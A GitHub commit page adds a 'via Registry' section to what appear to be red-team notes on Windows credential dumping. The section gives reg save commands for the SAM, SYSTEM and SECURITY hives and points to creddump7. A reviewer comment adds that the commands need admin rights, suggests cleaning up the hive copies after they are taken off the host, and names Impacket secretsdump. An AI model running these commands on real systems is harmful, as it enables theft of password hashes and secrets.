cred dumping using the registry

patch-8
llandeilocymro 2018-03-16 14:24:17 +00:00 committed by GitHub
parent fdde68b5e7
commit c3bda067e2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions


@ -34,3 +34,17 @@ Output:
C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>
## via Registry
Local SAM (sam & system), cached credentials (system & security) and LSA secrets (system & security) can be enumerated via three registry keys.
Input:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Output:
C:\>reg save HKLM\sam sam
The operation completed successfully.
These hives can be prcossed locally using creddump7 (https://github.com/Neohapsis/creddump7)
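Review bot: the last line of the hunk misspells "processed" as "prcossed", and the new section should say that `reg save HKLM\sam`, `HKLM\system` and `HKLM\security` only succeed from an elevated (administrator) prompt; the Output block shows a single "The operation completed successfully." and a reader trying this as a standard user will instead get "ERROR: Access is denied." Two smaller points: the three targets are registry hives rather than keys, and "enumerated" undersells what the commands do, since each writes a hive copy to disk (`sam`, `system`, `security` in the current directory) that should be removed after it has been copied off the host. Since the intro lists cached credentials and LSA secrets, it would also help to name the offline step for each, for example Impacket's `secretsdump.py -sam sam -system system -security security LOCAL`, next to the creddump7 link.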